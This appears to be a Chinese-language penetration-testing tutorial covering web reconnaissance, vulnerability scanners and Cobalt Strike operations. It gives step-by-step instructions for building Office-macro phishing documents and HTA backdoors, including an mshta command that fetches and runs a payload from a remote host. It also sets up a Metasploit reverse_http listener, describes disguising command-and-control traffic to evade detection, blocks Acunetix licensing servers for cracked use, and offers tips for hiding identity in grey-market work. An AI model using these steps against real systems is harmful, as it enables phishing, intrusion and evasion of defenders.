一、Web渗透前置流程(CTF/等保/护网Web测)

1. 信息收集全流程

  1. 域名&子域名探测

    • 工具:Fofa、鹰图测绘平台,挖掘二级域名(如dushi.bookresource.qq.com

    • 目标企业官网、公开备案域名作为基础入口

  2. 目录/路径扫描(未授权访问探测)

    • 工具:dirsearch、7kbscan

    • 敏感路径字典:/admin/manage/login/reg/register

    • 辅助手段:浏览器插件Find Something提取页面隐藏URL、接口路径

  3. 指纹识别

    • 工具:潮汐指纹识别、AI渗透平台(TRAE Work)

    • 作用:识别CMS、Web框架,针对性复现Nday历史漏洞

  4. 弱口令爆破

    • 基础弱口令组合:admin/admin、root/root等,配合后台登录页面爆破

2. 漏洞测试分工

  1. 工具漏扫漏洞:AWVS、Xray,擅长框架历史漏洞、反序列化、通用Web漏洞

  2. 手动测试漏洞:业务逻辑漏洞(越权、支付、验证码、会话绕过等)

  3. Nday复现:需先识别网站CMS/框架,再匹配对应POC验证

3. 两大漏扫工具部署与使用

(1)AWVS(Acunetix)
  1. 本地host配置(破解/离线扫描必备)

127.0.0.1 erp.acunetix.com
::1 erp.acunetix.com
192.178.49.174 telemetry.invicti.com
2607:f8b0:402a:80a::200e telemetry.invicti.com
  1. 使用流程 添加目标域名→自定义扫描速度→搭配Burp代理抓包查看完整扫描发包;扫描失败重启程序即可。

  2. 配套代理链路:AWVS发包 → BurpSuite(抓包分析)

(2)Xray(长亭社区版)
  1. 启动被动扫描命令

xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --htmloutput=out.html
  1. 证书配置:执行xray_windows_amd64.exe genca生成证书,浏览器导入

  2. 三层代理链路

    • 链路1:浏览器 → Xray(端口7777)

    • 链路2:浏览器 → Burp(8080) → Xray(7777)

  3. 短板:社区版POC数量少,复杂漏洞需手动补充

4. AI渗透辅助工具 TRAE Work

  • 功能:加载AI模型(DeepSeek-V4-Pro等)自动分析漏洞、批量执行POC、自动整理扫描报告

  • 适用场景:批量靶场、CMS历史漏洞批量检测

二、内网渗透核心工具 Cobalt Strike(CS)

1. 基础架构

  • 架构:Linux服务端 + Windows客户端,支持多用户分布式协同作战

  • 默认端口:50050(安全设备黑名单,实战必须修改)

  • 流量隐藏:自定义Malleable C2 Profile文件伪装流量

2. 服务端部署(Linux)

# 进入CS服务端目录
cd root/CS4.8/server
# 赋予运行权限
chmod +x teamserver TeamServerImage
# 启动服务端(本机IP、自定义密码、流量配置文件)
./teamserver 本机IP 自定义密码 profile.profile

3. 基础操作流程:监听配置 → 生成木马 → 目标上线

(1)创建监听器
  1. 菜单:Cobalt Strike → 监听器 → Add新建

  2. 常用Payload:

    • Beacon HTTP:反向HTTP木马(目标主动连接CS)

    • Foreign HTTP:用于联动MSF

  3. 自定义Host、端口,保存配置

(2)多类型木马生成(有效载荷)
  1. Windows可执行程序(exe):直接运行后门

  2. Office宏(Word/Excel/PPT):钓鱼核心载体

  3. HTA文档:HTML格式后门,mshta命令远程执行

  4. Payload生成器:原始shellcode,可二次免杀加工

(3)目标上线流程

生成木马→上传至目标主机→运行木马→CS监听器捕获Beacon会话

4. Beacon核心功能(目标上线后操作)

  1. 命令交互

    • ?:查看全部可用命令

    • shell 指令:执行系统命令(whoamidiripconfig等)

    • sleep 数值:调整心跳回连延时

  2. 远程控制

    • VNC:图形化远程桌面操作目标

    • 文件管理:远程上传/下载服务器文件

  3. 内网探测

    • ARP/ICMP网段扫描:探测同网段存活主机、开放端口(防火墙难拦截)

    • Net View:查看局域网共享主机

    • 进程列表:查看进程、Kill进程、伪造Token提权

  4. 团队协作

    • 公屏聊天:直接输入消息全员可见

    • 私聊:/msg 用户名 消息

5. CS插件扩展

  1. 支持.cna后缀插件(Ladon、OLa、TaoWu等内网工具)

  2. 加载步骤:脚本管理器 → Load → 选中插件cna文件打开,状态栏显示✔即加载成功

6. CS联动MSF(扩展漏洞库)

  1. Kali启动MSF:msfconsole

  2. CS新建Foreign HTTP监听器,IP/端口填写Kali地址

  3. MSF配置反向监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set Lhost Kali_IP
set Lport 监听端口
run
  1. CS右键目标会话 → 中转 → 增加会话,选择MSF监听,打通联动通道

7. Office宏钓鱼完整步骤

  1. CS生成Office宏代码(有效载荷→Office宏)

  2. 新建Word/Excel/PPT:视图 → 查看宏 → 自定义宏名 → 创建

  3. 删除默认VBA代码,粘贴CS生成的宏

  4. 保存格式:.xlsm/.docm(启用宏文档)

  5. 目标打开文件点击「启用内容」,CS自动上线

8. HTA后门远程执行

  1. CS生成HTA木马,使用站点管理-文件托管上传

  2. 获取托管URL,目标CMD执行命令上线:

mshta http://CSIP:端口/download/file.ext

三、安全合规&风险提示

  1. 工具使用边界

    • AWVS/Xray/CS仅可用于授权靶场、企业等保测评、护网行动;禁止无授权扫描公网资产,属于违法渗透

  2. 灰产风险规避(仅学习参考):不使用真实身份、全程代理流量

  3. 流量规避:CS默认端口易被检测,必须修改端口+自定义Malleable流量配置文件做流量伪装

Logo

AtomGit AI 社区提供模型库、数据集、Agent、Token等资源

更多推荐